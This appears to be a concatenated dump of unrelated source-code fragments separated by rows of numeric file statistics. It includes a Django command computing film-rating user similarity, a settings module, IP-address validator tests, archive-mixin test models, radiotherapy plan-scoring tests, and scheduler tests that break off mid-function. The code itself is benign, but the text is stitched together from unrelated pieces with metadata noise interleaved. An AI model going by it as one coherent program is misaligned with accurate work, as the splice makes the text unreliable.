SUM(v1.rating = 2 AND v2.rating = 4) AS number_of_ratings_24,
SUM(v1.rating = 2 AND v2.rating = 5) AS number_of_ratings_25,
SUM(v1.rating = 3 AND v2.rating = 1) AS number_of_ratings_31,
SUM(v1.rating = 3 AND v2.rating = 2) AS number_of_ratings_32,
SUM(v1.rating = 3 AND v2.rating = 3) AS number_of_ratings_33,
SUM(v1.rating = 3 AND v2.rating = 4) AS number_of_ratings_34,
SUM(v1.rating = 3 AND v2.rating = 5) AS number_of_ratings_35,
SUM(v1.rating = 4 AND v2.rating = 1) AS number_of_ratings_41,
SUM(v1.rating = 4 AND v2.rating = 2) AS number_of_ratings_42,
SUM(v1.rating = 4 AND v2.rating = 3) AS number_of_ratings_43,
SUM(v1.rating = 4 AND v2.rating = 4) AS number_of_ratings_44,
SUM(v1.rating = 4 AND v2.rating = 5) AS number_of_ratings_45,
SUM(v1.rating = 5 AND v2.rating = 1) AS number_of_ratings_51,
SUM(v1.rating = 5 AND v2.rating = 2) AS number_of_ratings_52,
SUM(v1.rating = 5 AND v2.rating = 3) AS number_of_ratings_53,
SUM(v1.rating = 5 AND v2.rating = 4) AS number_of_ratings_54,
SUM(v1.rating = 5 AND v2.rating = 5) AS number_of_ratings_55
FROM ktapp_vote v1
INNER JOIN ktapp_vote v2 ON v2.film_id = v1.film_id
WHERE v1.user_id = %s
GROUP BY v1.user_id, v2.user_id
HAVING COUNT(1) >= 50
) t
'''
KEYWORD_SIMILARITY_TEMPLATE = '''
SELECT
user_1_id, user_2_id, keyword_id,
number_of_ratings,
ROUND(1.0 * (
100 * number_of_ratings_11 +
85 * number_of_ratings_12 +
50 * number_of_ratings_13 +
15 * number_of_ratings_14 +
0 * number_of_ratings_15 +
85 * number_of_ratings_21 +
100 * number_of_ratings_22 +
65 * number_of_ratings_23 +
30 * number_of_ratings_24 +
15 * number_of_ratings_25 +
50 * number_of_ratings_31 +
65 * number_of_ratings_32 +
100 * number_of_ratings_33 +
65 * number_of_ratings_34 +
50 * number_of_ratings_35 +
15 * number_of_ratings_41 +
30 * number_of_ratings_42 +
65 * number_of_ratings_43 +
100 * number_of_ratings_44 +
85 * number_of_ratings_45 +
0 * number_of_ratings_51 +
15 * number_of_ratings_52 +
50 * number_of_ratings_53 +
85 * number_of_ratings_54 +
100 * number_of_ratings_55
) / number_of_ratings) AS similarity,
%s AS last_calculated_at
FROM (
SELECT
v1.user_id AS user_1_id, v2.user_id AS user_2_id, fk.keyword_id AS keyword_id,
COUNT(1) AS number_of_ratings,
SUM(v1.rating = 1 AND v2.rating = 1) AS number_of_ratings_11,
SUM(v1.rating = 1 AND v2.rating = 2) AS number_of_ratings_12,
SUM(v1.rating = 1 AND v2.rating = 3) AS number_of_ratings_13,
SUM(v1.rating = 1 AND v2.rating = 4) AS number_of_ratings_14,
SUM(v1.rating = 1 AND v2.rating = 5) AS number_of_ratings_15,
SUM(v1.rating = 2 AND v2.rating = 1) AS number_of_ratings_21,
SUM(v1.rating = 2 AND v2.rating = 2) AS number_of_ratings_22,
SUM(v1.rating = 2 AND v2.rating = 3) AS number_of_ratings_23,
SUM(v1.rating = 2 AND v2.rating = 4) AS number_of_ratings_24,
SUM(v1.rating = 2 AND v2.rating = 5) AS number_of_ratings_25,
SUM(v1.rating = 3 AND v2.rating = 1) AS number_of_ratings_31,
SUM(v1.rating = 3 AND v2.rating = 2) AS number_of_ratings_32,
SUM(v1.rating = 3 AND v2.rating = 3) AS number_of_ratings_33,
SUM(v1.rating = 3 AND v2.rating = 4) AS number_of_ratings_34,
SUM(v1.rating = 3 AND v2.rating = 5) AS number_of_ratings_35,
SUM(v1.rating = 4 AND v2.rating = 1) AS number_of_ratings_41,
SUM(v1.rating = 4 AND v2.rating = 2) AS number_of_ratings_42,
SUM(v1.rating = 4 AND v2.rating = 3) AS number_of_ratings_43,
SUM(v1.rating = 4 AND v2.rating = 4) AS number_of_ratings_44,
SUM(v1.rating = 4 AND v2.rating = 5) AS number_of_ratings_45,
SUM(v1.rating = 5 AND v2.rating = 1) AS number_of_ratings_51,
SUM(v1.rating = 5 AND v2.rating = 2) AS number_of_ratings_52,
SUM(v1.rating = 5 AND v2.rating = 3) AS number_of_ratings_53,
SUM(v1.rating = 5 AND v2.rating = 4) AS number_of_ratings_54,
SUM(v1.rating = 5 AND v2.rating = 5) AS number_of_ratings_55
FROM ktapp_vote v1
INNER JOIN ktapp_vote v2 ON v2.film_id = v1.film_id
INNER JOIN ktapp_filmkeywordrelationship fk ON fk.film_id = v1.film_id
WHERE v1.user_id = %s
AND fk.keyword_id IN (3,27,29,32,39,54,55,56,62,76,95,107,112,120,171,174,212,250,314,332,368,612,674,954,1229,1264,1265,1323,1672,4150)
GROUP BY v1.user_id, v2.user_id, fk.keyword_id
HAVING COUNT(1) >= 30
) t
'''
class Command(BaseCommand):
    """Recalculate user-user recommendation (similarity) data.

    With explicit ``user_id`` arguments the given users are refreshed; with
    no arguments one recently-active user is sampled at random (10% chance:
    a user who joined within the last year, otherwise an older user).
    """
    help = 'Calculate user-user recommendation'

    def add_arguments(self, parser):
        # Zero or more user ids; empty means "pick a random eligible user".
        parser.add_argument('user_id', nargs='*', type=int)

    def _refresh_similarity(self, label, similarity_template, keyword_predicate, user_id, now):
        """Recalculate one similarity family for *user_id*.

        label               -- 'generic' or 'keyword'; used only for progress output.
        similarity_template -- SELECT whose rows feed INSERT_SQL_TEMPLATE_1/2.
        keyword_predicate   -- 'IS NULL' (generic rows) or 'IS NOT NULL'
                               (keyword rows); selects which
                               ktapp_useruserrating rows this family owns.
        """
        self.stdout.write('Calculating %s...' % label)
        benchmark_now = datetime.datetime.now()
        self.cursor.execute(similarity_template, (now, user_id))
        similarity_rows = self.cursor.fetchall()
        self.stdout.write('Calculated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())
        self.stdout.write('Updating %s...' % label)
        benchmark_now = datetime.datetime.now()
        # Parameterize user_id instead of interpolating it with %d; the two
        # %-substituted pieces are trusted constants, never user input.
        delete_sql = 'DELETE FROM ktapp_useruserrating WHERE %s = %%s AND keyword_id %s'
        for user_column in ('user_1_id', 'user_2_id'):
            self.cursor.execute(delete_sql % (user_column, keyword_predicate), (user_id,))
        for row in similarity_rows:
            self.cursor.execute(INSERT_SQL_TEMPLATE_1, row)
            # Do not insert the mirrored row for self-pairs (user paired with itself).
            if row[0] != row[1]:
                self.cursor.execute(INSERT_SQL_TEMPLATE_2, row)
        self.stdout.write('Updated in %d sec.' % (datetime.datetime.now() - benchmark_now).total_seconds())

    def calculate_uur(self, user_id):
        """Refresh both similarity families for one user and stamp the user row."""
        self.stdout.write('Refreshing user-user recommendation for user %d...' % user_id)
        now = datetime.datetime.now()
        self._refresh_similarity('generic', GENERIC_SIMILARITY_TEMPLATE, 'IS NULL', user_id, now)
        self._refresh_similarity('keyword', KEYWORD_SIMILARITY_TEMPLATE, 'IS NOT NULL', user_id, now)
        connection.commit()
        u = models.KTUser.objects.get(id=user_id)
        u.last_uur_calculation_at = now
        u.save()
        self.stdout.write('Refreshed user-user recommendation for user %d in %f sec.' % (
            user_id,
            (datetime.datetime.now() - now).total_seconds(),
        ))

    def handle(self, *args, **options):
        self.cursor = connection.cursor()
        if options['user_id']:
            for user_id in options['user_id']:
                self.calculate_uur(user_id)
            return
        a_year_ago = datetime.date.today() - datetime.timedelta(days=365)
        a_month_ago = datetime.date.today() - datetime.timedelta(days=30)
        try:
            if random.random() < 0.1:
                # relatively new users: less than a year
                selected_user_id = models.KTUser.objects.filter(last_activity_at__gte=a_month_ago, date_joined__gte=a_year_ago, number_of_ratings__gte=50).only('id').order_by('?')[0].id
            else:
                # relatively old users
                selected_user_id = models.KTUser.objects.filter(last_activity_at__gte=a_month_ago, date_joined__lt=a_year_ago, number_of_ratings__gte=100).only('id').order_by('?')[0].id
        except IndexError:
            # No eligible user matched the sampling filter -- nothing to do.
            # (Was a silent `except Exception`; narrowed to the empty-queryset case.)
            return
        self.calculate_uur(selected_user_id)
| 42.033195
| 189
| 0.695459
| 1,686
| 10,130
| 3.879597
| 0.114472
| 0.134536
| 0.252255
| 0.135148
| 0.845895
| 0.832442
| 0.818376
| 0.79789
| 0.790858
| 0.7719
| 0
| 0.081414
| 0.198519
| 10,130
| 240
| 190
| 42.208333
| 0.724227
| 0.005824
| 0
| 0.731818
| 0
| 0.004545
| 0.672924
| 0.114422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013636
| false
| 0
| 0.022727
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1d4d24dce6eedf7a4e9943061beca1a1eb180677
| 616
|
py
|
Python
|
onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
import sys
from onlineweb4.settings.django import *
from onlineweb4.settings.base import *
from onlineweb4.settings.celery import *
from onlineweb4.settings.dataporten import *
from onlineweb4.settings.django_wiki import *
from onlineweb4.settings.gsuite import *
from onlineweb4.settings.logging import *
from onlineweb4.settings.raven import *
from onlineweb4.settings.rest_framework import *
from onlineweb4.settings.stripe import *
# Optional machine-local overrides loaded last so they win over the defaults.
try:
    from onlineweb4.settings.local import *
except ImportError:  # unused `as e` binding removed
    # No local settings file found.
    # You can still override using environment variables.
    pass
| 29.333333
| 57
| 0.798701
| 77
| 616
| 6.363636
| 0.428571
| 0.314286
| 0.493878
| 0.514286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020716
| 0.137987
| 616
| 20
| 58
| 30.8
| 0.902072
| 0.131494
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.066667
| 0.866667
| 0
| 0.866667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1d77d8dbe1a046d7dee01deca23cd7e3ba2e010d
| 3,983
|
py
|
Python
|
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | 3
|
2021-03-16T05:47:46.000Z
|
2021-03-23T17:43:55.000Z
|
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | null | null | null |
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | null | null | null |
import unittest
from pyva import Validator
class TestIpRules(unittest.TestCase):
    """Tests for the Validator 'ip', 'ipv4' and 'ipv6' rules."""

    # Addresses shared by several tests (same lists the original tests inlined).
    VALID_IPV4 = [
        '0.0.0.0',
        '9.255.255.255',
        '11.0.0.0',
        '126.255.255.255',
        '129.0.0.0',
        '169.253.255.255',
        '169.255.0.0',
        '172.15.255.255',
        '172.32.0.0',
        '191.0.1.255',
        '192.88.98.255',
        '192.88.100.0',
        '192.167.255.255',
        '192.169.0.0',
        '198.17.255.255',
        '223.255.255.255',
        '223.255.255.1',
    ]
    VALID_IPV6 = [
        '1200:0000:AB00:1234:0000:2552:7777:1313',
        '21DA:D3:0:2F3B:2AA:FF:FE28:9C5A',
        'FE80:0000:0000:0000:0202:B3FF:FE1E:8329',
    ]

    def _validate(self, ip, rule):
        """Build a Validator checking the single field 'ip' against *rule*."""
        return Validator(
            {
                'ip': ip
            },
            {
                'ip': rule
            }
        )

    def _assert_all_pass(self, ips, rule):
        # Every address must satisfy the rule.
        for ip in ips:
            self.assertTrue(self._validate(ip, rule).passes())

    def _assert_all_fail(self, ips, rule):
        # Every address must be rejected by the rule.
        for ip in ips:
            self.assertTrue(self._validate(ip, rule).fails())

    def test_ipv4_and_ipv6_ips(self):
        self._assert_all_pass(self.VALID_IPV4 + self.VALID_IPV6, 'ip')

    def test_ipv4_and_ipv6_ips_fails(self):
        self._assert_all_fail([
            '1200:0000:AB00:1234:O000:2552:7777:1313',  # letter O, not zero
            '[2001:db8:0:1]:80',
            'http://[2001:db8:0:1]:80',
            '256.0.0.0',
        ], 'ip')

    def test_ipv4(self):
        self._assert_all_pass(self.VALID_IPV4, 'ipv4')

    def test_ipv4_fails(self):
        # Malformed addresses plus well-formed IPv6 (wrong family for 'ipv4').
        self._assert_all_fail([
            '256.0.0.0',
            '1200::AB00:1234::2552:7777:1313',
            '1200:0000:AB00:1234:O000:2552:7777:1313',
            '[2001:db8:0:1]:80',
            'http://[2001:db8:0:1]:80',
        ] + self.VALID_IPV6, 'ipv4')

    def test_ipv6(self):
        self._assert_all_pass(self.VALID_IPV6, 'ipv6')

    def test_ipv6_fails(self):
        # Malformed addresses plus well-formed IPv4 (wrong family for 'ipv6').
        self._assert_all_fail([
            '1200:0000:AB00:1234:O000:2552:7777:1313',
            '[2001:db8:0:1]:80',
            'http://[2001:db8:0:1]:80',
            '256.0.0.0',
        ] + self.VALID_IPV4[:6], 'ipv6')
| 23.568047
| 54
| 0.342707
| 440
| 3,983
| 3.068182
| 0.154545
| 0.05037
| 0.037778
| 0.017778
| 0.905185
| 0.905185
| 0.84963
| 0.824444
| 0.824444
| 0.824444
| 0
| 0.375377
| 0.500377
| 3,983
| 169
| 55
| 23.568047
| 0.303015
| 0
| 0
| 0.671329
| 0
| 0
| 0.288153
| 0.119227
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.041958
| false
| 0.020979
| 0.013986
| 0
| 0.062937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1d81d8766b0f4d868d4d8d5d72081a20263d1929
| 41
|
py
|
Python
|
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | null | null | null |
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | null | null | null |
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | 1
|
2021-08-17T17:36:19.000Z
|
2021-08-17T17:36:19.000Z
|
from base_rbm import *
from rbm import *
| 13.666667
| 22
| 0.756098
| 7
| 41
| 4.285714
| 0.571429
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 23
| 20.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1d96fa5225cc1a77d949911aa1a8ec6a9f0770e0
| 2,208
|
py
|
Python
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 18
|
2015-11-08T16:22:19.000Z
|
2021-07-01T10:05:02.000Z
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 2
|
2019-03-28T10:06:05.000Z
|
2020-02-11T22:59:18.000Z
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 4
|
2016-02-03T02:12:55.000Z
|
2019-04-23T22:29:07.000Z
|
from django.db import models
from django_archive_mixin.mixins import ArchiveMixin
class BaseModel(models.Model):
    # Plain (non-archive) model used as an FK target in the tests below.
    # NOTE(review): ForeignKeys in this file omit on_delete, which implies a
    # pre-2.0 Django (CASCADE default) -- confirm before upgrading.
    name = models.CharField(max_length=100, blank=True, null=True)
class NullRelatedModel(models.Model):
    # Holds a nullable FK onto the plain BaseModel.
    nullable_base = models.ForeignKey(BaseModel, blank=True, null=True)
class BaseArchiveModel(ArchiveMixin, models.Model):
    # Archive (soft-delete) counterpart of BaseModel; FK target for the
    # Related* models below.
    name = models.CharField(max_length=100, blank=True, null=True)
class RelatedModel(models.Model):
    # Non-archive model pointing at BaseArchiveModel with every FK flavour
    # the tests exercise: required, nullable, SET_NULL and SET_DEFAULT.
    base = models.ForeignKey(BaseArchiveModel)
    null_base = models.ForeignKey(BaseArchiveModel, blank=True, null=True)
    set_null_base = models.ForeignKey(
        BaseArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_NULL)
    set_default_base = models.ForeignKey(
        BaseArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedCousinModel(models.Model):
    # Second hop in the FK chain: points at RelatedModel with the same four
    # FK flavours as RelatedModel itself.
    related = models.ForeignKey(RelatedModel)
    null_related = models.ForeignKey(RelatedModel, blank=True, null=True)
    set_null_related = models.ForeignKey(
        RelatedModel,
        blank=True, null=True, on_delete=models.deletion.SET_NULL)
    set_default_related = models.ForeignKey(
        RelatedModel,
        blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedArchiveModel(ArchiveMixin, models.Model):
    # Archive (soft-delete) counterpart of RelatedModel: same FK flavours
    # onto BaseArchiveModel.
    base = models.ForeignKey(BaseArchiveModel)
    null_base = models.ForeignKey(BaseArchiveModel, blank=True, null=True)
    set_null_base = models.ForeignKey(
        BaseArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_NULL)
    set_default_base = models.ForeignKey(
        BaseArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedCousinArchiveModel(ArchiveMixin, models.Model):
    """Archive counterpart of RelatedCousinModel: FK chain onto RelatedArchiveModel."""
    related = models.ForeignKey(RelatedArchiveModel)
    null_related = models.ForeignKey(
        RelatedArchiveModel, blank=True, null=True)
    # BUG FIX: this field was also named `null_related`, silently overwriting
    # the field above in the class body. Renamed to `set_null_related` to
    # match the parallel definitions in RelatedCousinModel/RelatedArchiveModel.
    set_null_related = models.ForeignKey(
        RelatedArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_NULL)
    set_default_related = models.ForeignKey(
        RelatedArchiveModel,
        blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
| 35.612903
| 74
| 0.746377
| 251
| 2,208
| 6.406375
| 0.139442
| 0.169154
| 0.121269
| 0.158582
| 0.810323
| 0.754353
| 0.752488
| 0.752488
| 0.752488
| 0.673507
| 0
| 0.003241
| 0.161685
| 2,208
| 61
| 75
| 36.196721
| 0.865478
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.622222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6398f68b09910e3fa844868578579e0f415b7d36
| 4,915
|
py
|
Python
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 7
|
2018-11-18T07:11:05.000Z
|
2021-05-06T21:53:40.000Z
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 9
|
2019-09-23T16:34:09.000Z
|
2020-05-26T18:49:43.000Z
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 2
|
2019-04-18T14:34:31.000Z
|
2019-06-19T19:34:33.000Z
|
import os
import pytest
from gui.api.backend import PyPlanScoringKernel
# TODO monkey patching DVH data to cut redundant calculations
# Case name shared by every test below.
_CASE_NAME = 'BiLateralLungSBRTCase'


def _case_files(dicom_folder):
    """Return (rs_dvh_path, criteria_xlsx_path, case_name) for the test case."""
    rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
    file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
    return rs_dvh, file_path, _CASE_NAME


def _configured_kernel(dicom_folder, ini_file_path):
    """Kernel with folder parsed, case set up, DVH calculator and planning item ready."""
    rs_dvh, file_path, case_name = _case_files(dicom_folder)
    p_kernel = PyPlanScoringKernel()
    p_kernel.parse_dicom_folder(dicom_folder)
    p_kernel.setup_case(rs_dvh, file_path, case_name)
    p_kernel.setup_dvh_calculation(ini_file_path)
    p_kernel.setup_planing_item()  # NOTE: 'planing' spelling is the project API name
    return p_kernel


def test_parse_dicom_folder(dicom_folder):
    """Parsing a folder containing RS/RD/RP dicom populates dcm_files."""
    p_kernel = PyPlanScoringKernel()
    p_kernel.parse_dicom_folder(dicom_folder)
    assert p_kernel.dcm_files


def test_parse_empty_dicom_folder(tmpdir):
    """Parsing a folder with no dicom files raises FileNotFoundError."""
    p_kernel = PyPlanScoringKernel()
    with pytest.raises(FileNotFoundError):
        p_kernel.parse_dicom_folder(tmpdir)


def test_setup_case(dicom_folder):
    """setup_case() populates the kernel's case."""
    rs_dvh, file_path, case_name = _case_files(dicom_folder)
    p_kernel = PyPlanScoringKernel()
    p_kernel.setup_case(rs_dvh, file_path, case_name)
    assert p_kernel.case is not None


def test_setup_dvh_calculation(dicom_folder, ini_file_path):
    """The DVH calculator is only created once a case has been set up."""
    rs_dvh, file_path, case_name = _case_files(dicom_folder)
    # Without a case, setup_dvh_calculation is a no-op.
    p_kernel = PyPlanScoringKernel()
    p_kernel.setup_dvh_calculation(ini_file_path)
    assert p_kernel.dvh_calculator is None
    # With a case, the calculator is created.
    p_kernel = PyPlanScoringKernel()
    p_kernel.setup_case(rs_dvh, file_path, case_name)
    p_kernel.setup_dvh_calculation(ini_file_path)
    assert p_kernel.dvh_calculator is not None


def test_setup_planning_item(dicom_folder, ini_file_path):
    """The planning item requires parsed dicom, a case AND a DVH calculator."""
    rs_dvh, file_path, case_name = _case_files(dicom_folder)
    p_kernel = PyPlanScoringKernel()
    # Each prerequisite alone is not enough; the item appears only after all three.
    p_kernel.setup_planing_item()
    assert p_kernel.planning_item is None
    p_kernel.parse_dicom_folder(dicom_folder)
    p_kernel.setup_planing_item()
    assert p_kernel.planning_item is None
    p_kernel.setup_case(rs_dvh, file_path, case_name)
    p_kernel.setup_planing_item()
    assert p_kernel.planning_item is None
    p_kernel.setup_dvh_calculation(ini_file_path)
    p_kernel.setup_planing_item()
    assert p_kernel.planning_item is not None


def test_calculate_dvh(dicom_folder, ini_file_path):
    """A fully configured kernel produces DVH data."""
    p_kernel = _configured_kernel(dicom_folder, ini_file_path)
    p_kernel.calculate_dvh()
    assert p_kernel.dvh_data


def test_calc_plan_score(dicom_folder, ini_file_path):
    """Plan scoring yields the known total score and a non-empty report."""
    p_kernel = _configured_kernel(dicom_folder, ini_file_path)
    p_kernel.calculate_dvh()
    p_kernel.calc_plan_score()
    assert not p_kernel._report_data_frame.empty
    assert round(p_kernel._total_score) == round(90.01)
    # save report data
    p_kernel.save_report_data()


def test_calc_plan_complexity(test_case, dicom_folder, ini_file_path):
    """Plan complexity matches the known reference value."""
    p_kernel = _configured_kernel(dicom_folder, ini_file_path)
    p_kernel.calc_plan_complexity()
    test_case.assertAlmostEqual(p_kernel.plan_complexity, 0.166503597706, places=3)


def test_save_dvh_data(dicom_folder, ini_file_path):
    """DVH data can be calculated and saved without error."""
    p_kernel = _configured_kernel(dicom_folder, ini_file_path)
    p_kernel.calculate_dvh()
    p_kernel.save_dvh_data()
| 29.431138
| 83
| 0.752391
| 706
| 4,915
| 4.852691
| 0.114731
| 0.118506
| 0.077058
| 0.061296
| 0.823117
| 0.780502
| 0.768827
| 0.758903
| 0.758903
| 0.758903
| 0
| 0.011233
| 0.166836
| 4,915
| 166
| 84
| 29.608434
| 0.825397
| 0.107426
| 0
| 0.706522
| 0
| 0
| 0.085111
| 0.075476
| 0
| 0
| 0
| 0.006024
| 0.130435
| 1
| 0.097826
| false
| 0
| 0.032609
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63d51778576b8b39481fa2803d29ee86340782ff
| 22,202
|
py
|
Python
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 8
|
2021-02-16T08:51:08.000Z
|
2021-07-05T09:04:29.000Z
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 5
|
2021-06-30T13:46:04.000Z
|
2021-12-08T14:14:02.000Z
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 1
|
2021-11-17T13:06:18.000Z
|
2021-11-17T13:06:18.000Z
|
import unittest
import replik.scheduler.scheduler as SCHEDULER
import replik.scheduler.schedule as SCHED
from replik.scheduler.resource_monitor import ResourceMonitor
from os.path import isfile
class TestSchedulingStep(unittest.TestCase):
def assert_is_running(self, proc):
    """Assert *proc* is RUNNING: no staging mark file, a running mark
    file present, and the place flag set to RUNNING."""
    staging_mark = SCHEDULER.get_mark_file_staging(proc.uid)
    running_mark = SCHEDULER.get_mark_file(proc.uid)
    self.assertFalse(isfile(staging_mark))
    self.assertTrue(isfile(running_mark))
    self.assertEqual(proc.place, SCHED.Place.RUNNING)
def assert_is_staging(self, proc):
    """Assert *proc* is STAGING: staging mark file present, no running
    mark file, and the place flag set to STAGING."""
    staging_mark = SCHEDULER.get_mark_file_staging(proc.uid)
    running_mark = SCHEDULER.get_mark_file(proc.uid)
    self.assertTrue(isfile(staging_mark))
    self.assertFalse(isfile(running_mark))
    self.assertEqual(proc.place, SCHED.Place.STAGING)
def assert_is_gone(self, proc):
    """Assert *proc* is KILLED: neither mark file exists and the place
    flag is set to KILLED."""
    staging_mark = SCHEDULER.get_mark_file_staging(proc.uid)
    running_mark = SCHEDULER.get_mark_file(proc.uid)
    self.assertFalse(isfile(staging_mark))
    self.assertFalse(isfile(running_mark))
    self.assertEqual(proc.place, SCHED.Place.KILLED)
def test_scheduling_without_gpu(self):
    """A CPU-only process leaves staging after a single scheduling step."""
    fake_docker = {}

    def fun_docker_kill(uid):
        assert uid in fake_docker, f"{uid} not in: " + str(fake_docker.keys())
        del fake_docker[uid]

    resources = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
    sched = SCHEDULER.Scheduler(
        resources, fun_docker_kill=fun_docker_kill, max_id=100
    )
    clock = 0
    sched.add_process_to_staging(
        {"cpus": 1, "gpus": 0, "memory": "10g"}, cur_time_in_s=clock
    )
    clock += 1
    sched.scheduling_step(
        running_docker_containers=[], current_time_in_s=clock
    )
    # The process requested no GPU and fits the monitor, so it is scheduled.
    self.assertEqual(0, len(sched.STAGING_QUEUE))
    self.assertEqual(1, len(sched.RUNNING_QUEUE))
def test_scheduling_step(self):
    """Two 1-GPU processes fit a 5-GPU monitor: one scheduling step moves
    both from the staging queue to the running queue."""
    FAKE_DOCKER = {}  # container_name -> state; stands in for the docker daemon
    def fun_docker_kill(uid):
        assert uid in FAKE_DOCKER, f"{uid} not in: " + str(FAKE_DOCKER.keys())
        del FAKE_DOCKER[uid]
    mon = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
    scheduler = SCHEDULER.Scheduler(
        mon, fun_docker_kill=fun_docker_kill, max_id=100
    )
    # A fresh scheduler has its full id pool free.
    self.assertEqual(100, len(scheduler.FREE_IDS))
    self.assertEqual(0, len(scheduler.USED_IDS))
    proc1 = scheduler.add_process_to_staging(
        {"cpus": 1, "gpus": 1, "memory": "10g"}, cur_time_in_s=0
    )
    # Each staged process consumes one id from the pool.
    self.assertEqual(99, len(scheduler.FREE_IDS))
    self.assertEqual(1, len(scheduler.USED_IDS))
